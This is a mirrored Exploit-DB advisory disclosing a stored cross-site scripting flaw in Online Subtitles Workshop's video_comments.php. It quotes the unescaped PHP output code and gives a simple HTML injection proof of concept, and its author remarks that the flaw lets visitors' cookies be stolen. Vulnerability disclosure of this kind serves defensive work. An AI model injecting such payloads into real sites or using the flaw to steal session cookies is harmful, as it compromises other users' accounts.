header-logo
Suggest Exploit
vendor:
Online Subtitles Workshop
by:
M.Jock3R
8.8
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: Online Subtitles Workshop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Sp2 FR
2009

Online Subtitles Workshop XSS vulnerabilities

A Cross-Site Scripting (XSS) vulnerability exists in Online Subtitles Workshop due to improper validation of user-supplied input in the 'video_comments.php' script. An attacker can inject malicious HTML or JavaScript code into the 'message' parameter of the 'video_comments.php' script, which will be executed in the browser of any user who views the comments page.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

===================================================================================
 Online Subtitles Workshop XSS vulnerabilities
===================================================================================
# Exploit Title: Online Subtitles Workshop XSS vulnerabilities
# Author: M.Jock3R (www.the-code.tk)
# Script Download: http://sourceforge.net/projects/onlinesubtitles/files/
# Category:: webapps
# Tested on: windows XP Sp2 FR
===================================================================================

Vuln file: video_comments.php

Vuln code:
---------
$all_comments = read_video_comments($video_id);

//print_r($all_comments);

$video_comments = "";

for ($i = 0; $i <= count($all_comments)-1; $i++) {

    $video_comments = $video_comments . "
<table style='width:100%'>
<tr>
<td style='width:100%'>
".get_user_name($all_comments[$i]['id'])."
</td>
<td>

".date('h:i:s A m-d-Y ', $all_comments[$i]['time'])." 
</td>
</tr>
<tr>
<td colspan='7'>
".$all_comments[$i]['message']." <== Here you can inject any HTML or Javascript code :)
</td>
</tr>
</table>
<br>
";

Exploit:
---------
First,Choose any video.
Go to comments, and write for example : <marquee><font color=red size=15>M.jock3r</font>/marquee>
-Or you can steal the cookies of any one browse the video page :)

===================================================================================
Greets To :
the C0de team / sa-hacker.com

Email : madrido.jocker@gmail.com
  
THANKS TO ALL ALGERIANS HACK3RS
===================================================================================

Navigation

Suggest Exploit

Services By CQR